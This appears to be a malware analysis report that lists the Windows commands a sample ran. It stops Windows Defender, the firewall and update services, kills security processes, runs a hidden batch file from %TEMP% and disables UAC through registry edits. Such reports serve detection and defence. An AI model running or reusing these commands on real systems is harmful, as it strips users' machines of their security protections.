Technical Information
- User Account Control (UAC)
- '<SYSTEM32>\net.exe' stop "WinDefend"
- '<SYSTEM32>\taskkill.exe' /f /t /im "MSASCui.exe"
- '<SYSTEM32>\net.exe' stop "WSearch"
- '<SYSTEM32>\net.exe' stop "WPCSvc"
- '<SYSTEM32>\net.exe' stop "wuauserv"
- '<SYSTEM32>\net.exe' stop "MpsSvc"
- '<SYSTEM32>\taskkill.exe' /f /t /im "FirewallControlPanel.exe"
- %TEMP%\3ef3.tmp\3ef4.bat
- nul
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\3EF3.tmp\3EF4.bat <Full path to file>"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\3EF3.tmp\3EF4.bat <Full path to file>"
- '<SYSTEM32>\net1.exe' stop "WinDefend"
- '<SYSTEM32>\net1.exe' stop "WSearch"
- '<SYSTEM32>\reg.exe' add HKCU\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies /v NoFind /t REG_DWORD /d "1"
- '<SYSTEM32>\net1.exe' stop "WPCSvc"
- '<SYSTEM32>\net1.exe' stop "wuauserv"
- '<SYSTEM32>\net1.exe' stop "MpsSvc"
- '<SYSTEM32>\cmd.exe' /k Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f
- '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f